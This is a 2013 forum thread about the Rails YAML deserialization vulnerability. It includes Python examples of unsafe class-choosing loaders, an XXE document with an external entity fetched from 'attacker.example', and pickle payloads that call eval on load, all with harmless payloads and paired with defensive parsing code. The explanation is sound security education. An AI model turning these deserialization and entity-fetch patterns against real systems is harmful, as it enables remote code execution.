What is crazy to me is everyone *has* had this bug, and learned from it, and fix...

alexch · on Jan 31, 2013

My analysis: layering. YAML doesn't in itself execute untrusted code, but it has a bunch of semi-experimental features most people don't know about or use, and one of those features (deserializing arbitrary classes) has a side effect that sets values on certain other classes -- not written by the people who wrote the YAML parser -- that then, often later on in their lifecycle, execute this untrusted code. I'm not saying this as an excuse -- I have long mistrusted YAML's blasé complexity, not to mention Rails' anarchic pass-HTTP-params-directly-into-the-DB pattern -- but as an explanation of how they missed it.
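A toy sketch of that layering, written in Python rather than Ruby. Every name here (`RouteTable`, `REGISTRY`, `naive_load`) is made up for illustration, and this is not the actual Rails or YAML code path. It only shows how a loader that lets the document pick the class can hand attacker data to a class that was written assuming trusted callers:

```python
# Toy illustration only: none of these names come from a real library.


class RouteTable:
    """Stands in for a class NOT written by the parser authors.

    It evaluates whatever it is assigned, on the assumption that only
    trusted application code ever assigns to it.
    """

    def __init__(self):
        self.routes = {}

    def __setitem__(self, name, expression):
        # Dangerous by design: evaluates the expression it is handed.
        self.routes[name] = eval(expression)


# Hypothetical registry of classes the loader is willing to build.
REGISTRY = {"RouteTable": RouteTable, "dict": dict}


def naive_load(document):
    """Hypothetical loader: the *document* chooses which class to build."""
    cls = REGISTRY[document["class"]]
    obj = cls()
    for key, value in document["items"].items():
        obj[key] = value  # looks harmless from inside the parser
    return obj


# Attacker-controlled data; the payload here is deliberately harmless.
untrusted = {"class": "RouteTable", "items": {"home": "1 + 1"}}
loaded = naive_load(untrusted)
print(loaded.routes["home"])
```

Neither piece looks wrong in isolation: the loader only does item assignment, and the class only evaluates what its callers give it. The hole appears when the two are combined.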

Also, more than other communities, Ruby has a cultural gap between the people developing the language and core libraries and the people using it to write web apps and frameworks.

Here are two good technical writeups of the exploit as it applies to Rails apps: http://blog.codeclimate.com/blog/2013/01/10/rails-remote-cod... http://ronin-ruby.github.com/blog/2013/01/09/rails-pocs.html

NelsonMinar · on Jan 31, 2013

Thanks, the complexity and layering are presumably part of the problem. This reminds me of the old XML External Entity attack that keeps coming back because developers don't realize you can coerce most XML parsers to open arbitrary URLs. That's been affecting products that parse XML for 10 years now, still hasn't stopped, and leads to ugly security holes (like in Adobe Reader). The root cause is that XML is far too complex and has surprising features; in this case, entity definition by URL.
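For anyone who hasn't seen one, here is roughly what such a document looks like, along with one possible defensive sketch using Python's standard `xml.parsers.expat`. The helper name `parse_without_doctype`, the `DoctypeForbidden` exception, and the `attacker.example` URL are all made up for illustration. The idea is that entities can only be declared inside a DOCTYPE, so refusing the DOCTYPE rules the feature out:

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a document carries a DOCTYPE declaration."""


def parse_without_doctype(xml_text):
    """Parse xml_text with expat, refusing any DOCTYPE declaration."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Abort before any entity declaration inside the DOCTYPE is read.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)  # True marks this as the final chunk
    return True


# An entity defined by URL; a permissive parser may fetch it when it
# expands &ext; in the document body.
hostile = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE doc [<!ENTITY ext SYSTEM "http://attacker.example/payload">]>'
    "<doc>&ext;</doc>"
)

try:
    parse_without_doctype(hostile)
except DoctypeForbidden as exc:
    print("rejected:", exc)
```

This only checks well-formedness and throws the content away; a real application would attach its own handlers or use a parser configured not to resolve external entities.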

steveklabnik · on Jan 31, 2013

The initial code for Rubygems was written at Rubyconf '06, if I remember correctly. The Ruby world was very, very different back then. Same with Rails, originally released in '05.

My point is that it's 'taken so long' because all this code is stuff that was written in a totally different time and place. And then was built on top of, after years and years and years.

Now that it _is_ being examined, that's why you see so many advisories. This is a good thing, not a bad one! It's all being looked through and taken care of.

jrochkind1 · on Jan 31, 2013

Because it was not obvious that "allowing de-serialization to objects of arbitrary classes specified in the serialized representation" was the same thing as "treating input as code to execute".
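A minimal sketch of why the two are the same thing, using Python's `pickle` as a stand-in (the Ruby/YAML mechanics differ in detail). The `Payload` class is made up for illustration and the expression it carries is deliberately harmless:

```python
import pickle


class Payload:
    """An object whose serialized form names a callable to run on load."""

    def __reduce__(self):
        # pickle records "call eval('6 * 7')" in the byte stream.
        # An attacker would put something far less friendly here.
        return (eval, ("6 * 7",))


blob = pickle.dumps(Payload())

# The bytes alone decide which callable is invoked during loading;
# what comes back is the result of that call, not a Payload instance.
result = pickle.loads(blob)
print(result)
```

Nothing in the call to `pickle.loads` looks like "execute this code", which is the whole problem.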

And then, as someone else said, because of layering. The next downstream user using YAML might not have even realized that YAML had this feature, on top of not realizing the danger of this feature. And then someone else downstream of THAT library, etc.

Maybe it _should_ have been obvious, but it wasn't, as evidenced, as you say, by all the people who have done it before. After the FIRST time it was discovered, it should have been obvious, so why did it happen even a second time?

In part, because for whatever reason, none of those exploits got the (negative) publicity that the rails/yaml one is getting. Hopefully it (the dangers of serialization formats allowing arbitrary class/type de-serialization) WILL become obvious to competent developers NOW, but it was not before.

20 years ago, you could write code thinking that giving untrusted user input to it was a _special case_. "Well, I guess, now that you mention it, if you give untrusted input that may have been constructed by an attacker to this function it would be dangerous, but why/how would anyone do that?" Things have changed. There's a lot more code where you should be assuming that passing untrusted input to it will be done, unless you specifically and loudly document not to. But we're still using a lot of code written under the assumptions of 20 years ago -- assumptions that were not necessarily wrong cost/benefit analyses 20 years ago. And yeah, some people are still WRITING code under the security assumptions of 20 years ago too, oops.

At the same time, we have a LOT MORE code _sharing_ than we had 20 years ago. (Internet open source has drastically changed the way software is written.) And the Ruby community is especially 'advanced' at code sharing, using each other's code as dependencies in a complex multi-generation dependency graph. That greatly increases the danger of unexpected interactions of features creating security exploits that would not have been predicted by looking at any part in isolation. But we couldn't accomplish what we have all accomplished without using other people's open source code as more-or-less black box building blocks for our own; we can't do a full security audit of all of our dependencies (and our dependencies' dependencies, etc.).

Spakman · on Jan 31, 2013

Presumably they missed it the same way the developers of those other things you listed did. I can only assume they didn't know about these other problems when developing their YAML parsers.

Of course, you could argue that developers should always be thinking about and searching for security related issues in whatever field they're working in, but that doesn't appear to be the norm at the moment.

rmc · on Feb 1, 2013

Python has this bug; you can't unpickle untrusted input

I thought you could unpickle untrusted input in Python? Sure, there's a great big red warning message in the documentation, and hence it's currently rare for people to do it, but it is technically allowed, right?

gthbriem · on Feb 1, 2013

Sure, this is “can't” in the sense “must not”.
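For reference, the `pickle` documentation does describe a way to narrow what a pickle may load, by overriding `Unpickler.find_class`. A sketch along those lines follows; the allow-list contents and the names `SAFE_BUILTINS`, `RestrictedUnpickler` and `restricted_loads` are choices made here for illustration. It reduces the exposure but should not be read as making untrusted pickles safe:

```python
import builtins
import io
import pickle

# Assumption for this sketch: only these builtins may be named by a pickle.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the byte stream asks for a global by name.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    """Like pickle.loads, but refusing globals outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Plain data, plus an allow-listed type, still round-trips.
print(restricted_loads(pickle.dumps([1, 2, range(3)])))

# A hand-written protocol-0 pickle that asks for builtins.eval.
hostile = b"cbuiltins\neval\n(S'6 * 7'\ntR."
try:
    restricted_loads(hostile)
except pickle.UnpicklingError as exc:
    print("refused:", exc)
```

If the data really is untrusted, a format that cannot name classes at all (JSON, for instance) is the more conservative choice.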